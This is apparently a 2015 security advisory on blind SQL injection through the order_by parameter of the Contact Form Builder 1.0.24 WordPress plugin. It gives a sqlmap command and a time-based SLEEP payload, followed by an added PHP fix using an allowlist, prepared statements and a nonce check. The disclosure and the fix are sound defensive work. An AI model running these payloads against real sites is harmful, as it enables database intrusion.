Subject: Blind SQL injections in Contact Form Builder 1.0.24
Date: Tue, 7 Jul 2015 12:14:52 +0200


Plugin: Contact Form Builder 1.0.24 

Authenticated administrators can execute arbitrary SQL commands (there is no CSRF protection).

1. SQL injection (CFMModelBlocked_ips_cfm::get_rows_data())

Method: POST
Url: http://localhost/wp-admin/admin.php?page=blocked_ips_cfm
Parameters: order_by, asc_or_desc

Example PHP callstack:

  CFMModelBlocked_ips_cfm::get_rows_data   [/contact-form-builder/admin/models/CFMModelBlocked_ips_cfm.php:33]

Sqlmap verification: 

sqlmap --cookie "..." --dbms mysql --method POST --data "order_by=ip&asc_or_desc=asc" -u http://localhost/wp-admin/admin.php?page=blocked_ips_cfm -p order_by

Parameter: order_by (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: order_by=ip AND (SELECT * FROM (SELECT(SLEEP(5)))sUkE)&asc_or_desc=asc

Please note that there has to be at least one record in the wp_contactformmaker_blocked table for the sqlmap payloads to execute successfully.

2. SQL injection (CFMModelManage_cfm::get_rows_data())

Analogous to SQL injection #1; the two methods are almost identical.
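Both findings share the same root cause: the sort column and sort direction arrive from the request and are placed into ORDER BY, where prepared-statement placeholders cannot help because they are identifiers, not values. The following is an added illustration of the fix a plugin author would apply, not the plugin's own code: allowlist the column and direction, use placeholders for the numeric parts, and require a WordPress nonce on the admin POST so the request cannot be forged cross-site. The column names, the table name and the function names are assumptions; `check_admin_referer`, `$wpdb->prepare` and `$wpdb->get_results` are the real WordPress APIs.

```php
<?php
// Added example (not from the Contact Form Builder plugin): sanitize the
// order_by / asc_or_desc parameters before they reach ORDER BY.

// Assumed sortable columns of the blocked-IP table and the accepted directions.
const CFM_SORTABLE_COLUMNS = ['id', 'ip', 'date'];
const CFM_SORT_DIRECTIONS  = ['asc' => 'ASC', 'desc' => 'DESC'];

/**
 * Map raw request input to a safe [column, direction] pair.
 * Anything not on the allowlist falls back to the default, so a value such as
 * "ip AND (SELECT * FROM (SELECT(SLEEP(5)))sUkE)" never becomes part of the SQL.
 */
function cfm_sanitize_order(array $request): array {
    $col = isset($request['order_by']) ? (string) $request['order_by'] : 'id';
    $dir = isset($request['asc_or_desc'])
        ? strtolower((string) $request['asc_or_desc'])
        : 'asc';

    if (!in_array($col, CFM_SORTABLE_COLUMNS, true)) {
        $col = 'id';
    }
    $dir = CFM_SORT_DIRECTIONS[$dir] ?? 'ASC';

    return [$col, $dir];
}

/**
 * Build the rows query. Identifiers come only from the allowlists above;
 * the numeric LIMIT/OFFSET go through $wpdb->prepare placeholders.
 * $wpdb is the WordPress database object; the table name is assumed.
 */
function cfm_blocked_ips_query($wpdb, array $request, int $limit = 20, int $offset = 0): string {
    [$col, $dir] = cfm_sanitize_order($request);
    $table = $wpdb->prefix . 'contactformmaker_blocked';
    return $wpdb->prepare(
        "SELECT * FROM `$table` ORDER BY `$col` $dir LIMIT %d OFFSET %d",
        $limit,
        $offset
    );
}

/**
 * Admin-page handler (hypothetical). The nonce check closes the CSRF gap the
 * advisory mentions: check_admin_referer() stops the request unless the POST
 * carries a nonce issued for this action to the logged-in administrator.
 */
function cfm_handle_blocked_ips_request(array $request): array {
    global $wpdb;
    check_admin_referer('cfm_blocked_ips_sort');
    return $wpdb->get_results(cfm_blocked_ips_query($wpdb, $request));
}

// Stand-alone check of the sanitizer with the payload shape from the advisory
// (constructed input; no database needed). The injected column string is not
// on the allowlist, so the default column is used and the direction is kept.
$raw = [
    'order_by'    => 'ip AND (SELECT * FROM (SELECT(SLEEP(5)))sUkE)',
    'asc_or_desc' => 'asc',
];
var_dump(cfm_sanitize_order($raw));
```

The allowlist is the important part: escaping functions such as `esc_sql()` are meant for string values inside quotes and do not make an unquoted identifier or keyword position safe, which is why the time-based blind payload above works against a query that merely concatenates the parameter after ORDER BY.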


Marcin Probola,